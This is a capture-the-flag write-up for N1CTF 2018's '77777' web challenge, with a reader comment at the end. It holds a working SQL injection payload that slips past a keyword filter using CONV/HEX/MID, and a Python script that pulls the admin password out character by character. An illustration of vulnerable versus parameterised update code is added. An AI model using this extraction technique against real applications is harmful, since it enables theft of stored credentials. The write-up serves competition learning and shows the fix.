
N1CTF - 77777 Write-up
-------------------------
Category: Web
Points: 1000 (Dynamic scoring, goes down when more people solve it)

Description:
```
"77777" is my girlfriend's nickname, have fun xdd:)

hk node: http://47.75.14.48

cn node: http://47.97.168.223

(Two challenge servers are identical, use either of them.)
```
Upon visiting the site we're shown two very big hints: ``U can update my points in Profile.`` and ``And the flag is `admin's password`:)``. Looking at the rest of the pages, the "Profile" page simply displays the amount of points the user has, the "Somecode" page gives a screenshot of the code running in the background, and the "Someinfo" page gives a screenshot of what software is running on the server.

Somecode Picture:
![code](https://i.imgur.com/EMBZgXH.png)

After reading over the code it's obvious that the $points variable is vulnerable to SQL injection; however, it is also run through a waf function which we don't have the code for. After some research into different ways I could exploit it, I discovered a technique [here]() that uses CONV(HEX((query))) to extract data. After struggling to get it working for ages, I finally got it working with this payload: ``*CONV(HEX((SELECT MID(password,1,3))),16,10)``. For anyone who isn't familiar with the functions in the statement, here is a breakdown. MID returns a substring of the field (I couldn't use SUBSTRING because it was blocked by the waf :( ); the format is ``MID(field, <starting position>, <length>)``. HEX turns that substring into its hexadecimal string form, and CONV(..., 16, 10) converts that string from base 16 to a decimal number, so the number that ends up stored as points is just the hex encoding of the extracted text and can be converted back into characters. After some more fiddling around I wrote a quick Python script to automate it for me and do the decoding.
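As an added illustration (not code from the original write-up or from the challenge itself), the following Python models the server-side pattern the write-up describes: the points value is pasted into the UPDATE as text, so the database evaluates whatever expression follows the number, and a keyword blocklist like the challenge's waf() only catches the tokens it knows about. The hardened handler beside it validates points as an integer and binds it as a query parameter, which is the fix. SQLite stands in for the challenge's MySQL here (so CONV()/HEX() are not involved); the table, users, passwords and blocklist are all constructed for the demo, and the "sorry" response is a hypothetical failure message.

```python
import sqlite3

# Constructed, in-memory stand-in for the challenge database (SQLite, not MySQL).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, points INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "placeholder_flag", 0), ("guest", "guest", 0)])
    conn.commit()
    return conn

# Hypothetical keyword blocklist standing in for the challenge's unknown waf().
BLOCKED = ("SUBSTRING", "UNION", "--")

def waf(value):
    upper = value.upper()
    return not any(tok in upper for tok in BLOCKED)

def get_points(conn, username):
    return conn.execute("SELECT points FROM users WHERE username = ?", (username,)).fetchone()[0]

def update_points_vulnerable(conn, username, flag, hi):
    # Reconstruction of the pattern the write-up describes (not the challenge's code):
    # points = flag . hi is pasted straight into the UPDATE, so anything after the
    # number is parsed and evaluated as SQL, and only the blocklist stands in the way.
    points = flag + hi
    if not waf(points):
        return "sorry"
    conn.execute(f"UPDATE users SET points = {points} WHERE username = '{username}'")
    conn.commit()
    return get_points(conn, username)

def update_points_hardened(conn, username, flag, hi):
    # Fix: validate the type first (points is an integer, so anything else is rejected
    # before it gets near the query), then bind it as a parameter so the database
    # never interprets user input as SQL. No blocklist is needed.
    try:
        points = int(flag + hi)
    except ValueError:
        return "sorry"
    conn.execute("UPDATE users SET points = ? WHERE username = ?", (points, username))
    conn.commit()
    return get_points(conn, username)

if __name__ == "__main__":
    db = make_db()
    print(update_points_vulnerable(db, "guest", "1", "*7"))      # DB evaluates 1*7
    print(update_points_hardened(make_db(), "guest", "1", "*7"))  # rejected: "sorry"
```

The vulnerable path shows why the challenge leaks data through the points field: a sub-select on another row is just another expression to the database, and a keyword blocklist can only ever block the spellings it has been told about. The hardened path removes the whole class of bug rather than chasing keywords.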

```
import requests
import re

s = requests.Session()
regex = r"\|\s[\d]+<br"  # Regex to extract the current points from the profile page
flag = "1"
i = 1
password = ""
url = "http://47.75.14.48/"

while True:
    # Points become 1 * CONV(HEX(<i-th character>),16,10), i.e. the character's ASCII code
    hi = '*CONV(HEX((SELECT MID(password,{},1))),16,10)'.format(i)
    postData = {
        "flag": flag,
        "hi": hi
    }
    attack = s.post(url, data=postData)
    result = re.findall(regex, attack.text)
    if len(result) > 0:
        # Strip the "| " prefix and "<br" suffix to leave the decimal points value
        points = int(result[0].replace("| ", "").replace("<br", ""))
        if points == 0:
            # HEX('') is empty, so CONV() gives 0 once we are past the end of the password
            break
        # The stored number is the hex of one character read in base 16, so it is just its ASCII code
        password += chr(points)
        print(password)
        i += 1
    else:
        break
```

Original writeup (https://github.com/notdls/ctf-write-ups/blob/master/N1CTF_2018/Web/77777.md).
0x0ffinfo, March 12, 2018, 10:47 a.m.

I missed something on this one... I found all the clues you present, but I never could modify the points...

I tried with the simplest POST data: flag=1&hi=1 and some others, up to some complex SQLi. I never did a single update....

Can you tell me how I could modify points regularly (without SQLi)? And where the fuck was the "sorry" message displayed on failure...

Thanks mate for your well-explained writeup!